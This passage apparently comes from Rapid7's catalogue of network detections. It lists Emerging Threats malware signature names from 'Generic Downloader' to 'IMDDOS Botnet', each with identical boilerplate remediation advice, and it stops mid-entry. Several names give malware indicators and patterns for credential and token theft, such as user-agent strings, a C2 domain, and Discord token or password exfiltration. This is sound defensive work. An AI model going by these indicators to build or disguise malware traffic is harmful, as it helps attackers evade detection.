Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Downloader - HTTP POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Dropper/Clicker Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Dropper Installing PUP 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Dropper Installing PUP 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic gate .php GET with minimal headers

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GENERIC Likely Malicious Fake IE Downloading .exe

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic.Malware.SFL User-Agent (Rescue/9.11)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic -POST To file.php w/Extended ASCII Characters

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic - POST To .php w/Extended ASCII Characters

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Request to gate.php Dotted-Quad

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Spambot (often Tibs) Post-Infection Checkin (justcount.net likely)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Trojan Checkin (UA VBTagEdit)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Trojan with /? and Indy Library User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Win32.Autorun HTTP Post

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Genome User-Agent (Http Down)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Geocon CnC Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Georbot checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Georbot initial checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Georbot requesting update

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Georgian Targeted Attack - Trojan Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GET to Google with specific HTTP lib likely Cycbot/Bifrose/Kryptic checking Internet connection

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gimemo Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GlitchPOS CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Glupteba CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Go/Anubis CnC Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoBrut/StealthWorker Requesting Brute Force List (flowbit set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoBrut/StealthWorker Service Bruter CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoBrut/StealthWorker Service Bruter CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Godlua Backdoor Downloading Encrypted Lua

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Go/Hack Browser Data Exfil Attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoLang Discord Token Grabber Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoldenSpy CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GoldenSpy CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gootkit Checkin User-Agent 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Go/PSW.Agent_AGen.A Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GORGON APT Download Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GORGON APT Download Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gozi/BlackNet Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gozi check-in / update

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gozi Communication 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gozi/Ursnif/Papras Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gozi/Ursnif/Papras Grabftp Module Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Grandoreiro CnC Activity (vbs)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Grandoreiro Downloader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GreenDou Downloader User-Agent (hello crazyk)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gulpix/PlugX Client Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE H1N1 Loader CnC Beacon M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE H1N1 Loader CnC Beacon M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE HabitsRAT Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE hacker87 checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hacking Team Android Implant Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hacking Team Elite Windows Implant Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hacking Team Implant Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hacking Team Scout Windows Implant Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HackTool.Linux.SSHBRUTE.A Haiduc Initial Compromise C2 POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hades APT Downloader Attempting to Retrieve Stage 2 Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hangover Campaign Keylogger 2 checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hangover Campaign Keylogger Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Harvester Group Downloader Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Havex RAT CnC Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Havex RAT CnC Server Response HTML Tag

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HAWKBALL CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HAWKBALL CnC Initial Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HAWKBALL CnC Sending System Information

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Haxdoor Reporting User Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Haxdoor Reporting User Activity 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HB_Banker16 Get

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HiddenTears Ransomware Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Higaisa CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Higaisa CnC (ipconfig)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Higasia CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HighTide trojan Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hiloti loader installed successfully request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hiloti loader requesting payload URL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hiloti/Mufanom Downloader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hitpop.AG/Pophot.az HTTP Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hoax.Win32.BadJoke/DownLoader1.57593 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HompesA Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTA.BabyShark Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTA.BabyShark HTTP Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTML/Xbash Hex Encoded PowerShell Args Inbound - Stage 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTML/Xbash Hex Encoded PS WebClient Object Inbound - Stage 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTP Andromeda File Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTP Connection To Known Sinkhole Domain sinkdns.org

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTPCore CnC Tasking File

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTPCore CnC Task Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTPCore CnC Task Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTP Request for Possible ELF/LiLocked Ransomware Note

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE HTTP Request to a *.pw domain with direct request/fake browser (multiple families flowbit set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTP Request to a *.su domain with direct request/fakebrowser (multiple families flowbit set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HTTPTool User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hupigon.DF Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hupigon URL Infection Checkin Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hupigon User Agent Detected (??)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hupigon User Agent Detected (RAV1.23)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Hupigon User Agent Detected (VIP2007)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE HYDSEVEN VBS CnC Host Information Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IcedID CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IcedID CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IcedID CnC Domain in SSL/TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE IcedID CnC Domain in SSL/TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE IcedID CnC Domain in SSL/TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE IcedID/Emotet Certificate Observed M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IcedID Observed Domain (loadfreeman .casa in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IcedID WebSocket Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ICEFOG JAVAFOG JAR checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ICEFOG-P Variant CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ICEFOG-P Variant CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IceRat Backdoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IceRat CnC Acitivty M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE iebar Spyware User Agent (iebar)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IIStealer Inbound Exfil Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IIStealer Inbound Exfil Request M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Illusion Bot (Lussilon) Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IMDDOS Botnet User-Agent IAMDDOS

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE IMDDOS Botnet User-Agent kav

Description

